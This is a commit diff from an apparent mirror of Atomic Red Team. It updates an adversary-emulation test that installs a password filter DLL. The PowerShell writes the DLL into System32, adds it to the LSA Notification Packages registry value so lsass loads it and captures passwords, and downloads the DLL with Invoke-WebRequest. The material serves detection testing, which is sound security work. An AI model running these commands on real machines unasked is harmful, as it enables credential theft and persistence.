security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-08-29 18:20:24 +00:00
parent 5419dacb9d
commit c4b097e918
2 changed files with 89 additions and 51 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+72 -45
View File
@@ -5902,38 +5902,47 @@ defense-evasion:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1600.001:
@@ -51167,38 +51176,47 @@ persistence:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1505.005:
@@ -73450,38 +73468,47 @@ credential-access:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1558.004:
atomics/T1556.002/T1556.002.md
+17 -6
View File
@@ -15,6 +15,10 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
**Supported Platforms:** Windows
@@ -28,33 +32,40 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll|
| dll_path | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\bin|
| dll_name | Name of the Password Filter | String | AtomicRedTeamPWFilter.dll|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
```
#### Cleanup Commands:
```powershell
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
```
#### Dependencies: Run with `powershell`!
##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})
##### Description: AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_dll}) {exit 0} else {exit 1}
if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host "You must provide your own password filter dll"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
```